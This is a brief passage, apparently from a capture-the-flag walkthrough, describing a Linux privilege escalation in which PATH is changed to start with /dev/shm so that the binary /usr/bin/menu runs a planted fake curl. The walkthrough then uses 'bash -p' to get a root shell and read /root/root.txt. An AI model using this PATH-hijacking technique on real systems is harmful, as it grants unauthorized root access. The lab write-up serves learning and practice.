Step two: knowing the PATH, we can now export PATH and make it start with /dev/shm instead of /usr/local as it did in step one.
Further down we see that, after exporting it, listing PATH no longer starts with /usr/local but with /dev/shm:/usr/local, etc. With that done, little remains to escalate our privileges.
root
We run the binary /usr/bin/menu and this time we don't see the curl-style output we saw the first time, which means it ran our curl and not the original one.
Next, we run bash -p to get a bash with elevated privileges and look for the flag, which is always in /root/root.txt.